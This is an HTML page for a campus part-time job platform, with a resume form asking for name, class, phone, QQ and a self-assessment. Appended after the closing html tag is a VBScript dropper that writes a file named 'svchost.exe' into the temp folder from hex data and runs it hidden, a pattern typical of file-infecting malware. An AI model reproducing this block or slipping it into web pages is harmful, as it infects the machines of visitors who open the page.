<!doctype html>
<html>
<head>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="jquery.jslides.css" media="screen" />
<script type="text/javascript" src="jquery-1.8.0.min.js"></script>
<script type="text/javascript" src="jquery.jslides.js"></script>
<title>guestbook</title>
     <style>
            *{
             padding:0px;
             margin:0px;}
             a{
               text-decoration:none;
               color:#000;}
             ul{
                 list-style:none;}
            .top{
                height:120px;
                background:#00b187;}
           .logo{
               height:120px;
               }
            .menu{
               float:right;
               width:670px;
               height:40px;
               position:absolute;
               top:5px;
               right:100px;
               }
            .menu a{
                display:block;
                float:left;
                width:110px;
                height:40px;
                line-height:40px;
                text-align:center;
                color:#FFF;
                margin-top:40px;
                font-family:微软雅黑;}
            .menu a:hover{
                background:url(images/menu_bg_h.png) center center no-repeat;
                color:#66973C;}
                #full-screen-slider { 
                width:100%; 
                height:396px; 
                float:left; 
                position:relative}
             #slides { 
                display:block; 
                width:100%; 
                height:396px; 
                list-style:none;
                padding:0; 
                margin:0; 
                position:relative}
             #slides li { 
                display:block;
                width:100%;
                height:100%;
                list-style:none;
                padding:0;
                margin:0; 
                position:absolute}
             #slides li a {
                display:block;
                width:100%;
                height:100%;
                text-indent:-9999px}
            .about-main{
                width:1000px;
                min-height:360px;
                height:auto;
                margin:0 auto;}
            .slide{
                height:360px;
                width:220px;
                float:left;
                border:1px solid #ccc;
                margin:-top:5px;
                margin-bottom:5px;}
            
            .right{
                min-height:360px;
                height:auto;
                width:500px;
                float:left;}
            .right2{
              float: left;

            }
            .content{
                padding:5px;
                line-height:22px;
                font-size:13px;
                text-indent:2em;
                margin-top:10px;
                width:1000px;}
            .content ul{
                height:40px;
                font-size:13px;}
            .content ul li{
                height:40px;
                line-height:40px;
                float:left;}
            .content ul li.title{
                width:150px;
                text-align:right;}
            .content ul li.title.must{
                color:red;}
            .content ul.ct{
                height:100px;
                }
            .content ul.ct.title{
                height:100px;
                line-height:100px;}
            .content ul.ct textarea{
                margin-top:10px;}
            .content ul li input{
                height:22px;
                width:250px;}
            .content div{
                clear:both;}
            .content div input{
                margin-left:200px;}
            .submenu{
                height:30px;
                line-height:30px;
                width:1000px;
                border-bottom:1px solid #666;
                padding-left:10px;}
            .submenu a{
                font-size:16px;}
            .footer{
                height:140px;
                background:#00b187;
                clear:both;
                position:absolute;
                top:920px;
                left:0px;}
            .center-box{
                width:1422px;
                height:120px;
                margin:0 auto;}
            .text{
                 height:105px;
                 color:#fff;
                 float:left;
                 line-height:23px;
                 font-size:13px;
                 padding-top:15px;
                 padding-left:120px;
                 position:relative;
                 top:5px;
                 left:200px;}
            .weixin{
                height:95px;
                float:right;
                text-align:center;
                padding-right:120px;
                padding-top:25px;
                position:relative;
                top:5px;
                left:-240px;}
     </style>
</head>

<body>
      <div class="top">
           <div class="logo">
                <img src="image/logo.png" style="width:360px; height:96px; margin-top:20px; margin-left:100px;">
           </div>
       <div class="menu">
              <a href="index.html">首页</a>
             <a href="a.html">发布兼职</a>
             <a href="b.html">求职投递</a>
             <a href="news_article.php">校园新闻</a>
             <a href="">服务帮助</a>
             <a href="guestbook.html">在线留言</a>
         </div>
     </div>
    <div id="full-screen-slider">
    <ul id="slides">
        <li style="background:url('image/a.png') no-repeat center top">
            <a href="" target="_blank">第一张焦点幻灯的标题</a>
        </li>
        <li style="background:url('image/2.png') no-repeat center top">
            <a href="" target="_blank">第二张焦点幻灯的标题</a>
        </li>
    </ul>
   </div>
<div class="about-main">
     
        <div class="right">
              <div class="submenu"><a href="index.html"></a>  <h1><a href="">填写简历</a></h1></div>
              <div class="content">
                  <form name="form1" id="form1" action="" method="post">
                       <ul>
                           <li class="title"><span class="must"></span>名字:</li>
                           <li><input name="title" type="text" id="title"></li>
                       </ul>
                        <ul>
                           <li class="title"><span class="must"></span>班级:</li>
                           <li><input name="name" type="text" id="name"></li>
                       </ul>
                        <ul>
                           <li class="title">手机:</li>
                           <li><input name="tel" type="text" id="tel"></li>
                       </ul>
                        <ul>
                           <li class="title">QQ:</li>
                           <li><input name="qq" type="text" id="qq"></li>
                       </ul>
                       <ul>
                           <li class="title"><span class="must"></span>意向兼职:</li>
                           <li><input name="email" type="text" id="email"></li>
                       </ul>
                       <ul class="ct">
                           <li class="title"><span class="must"></span>自我评价</li>
                           <li>
                               <textarea name="content" cols="34" rows="5" id="content"> </textarea>
                           </li>
                       </ul>
                       <div>
                            <input type="image" src="images/submit.png">
                       </div>
                  </form>
              </div>
        </div>
        <div class-"right2">
          <img src="image/tu1.jpg" style="width:500px; height:300px;padding-top: 40px; " >
        </div>

   </div>
  
   <div class="footer">
         <div class="center-box">
                <div class="text">
                   校园兼职平台<br/>
                   电话：027-87221877E-maishxm@hubeiwater.gov.cn<br/>
                   地址：包头市土默特右旗萨拉齐镇内蒙古农业大学职业技术学院<br/>
                   友情链接:<a href="">内蒙古农业大学职业技术学院</a>&nbsp;&nbsp;
                </diV>
              <div class="weixin">
                   <img src="images/ewm.png" alt="">
              </div>
         </div>
    </div>
</body>
</html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>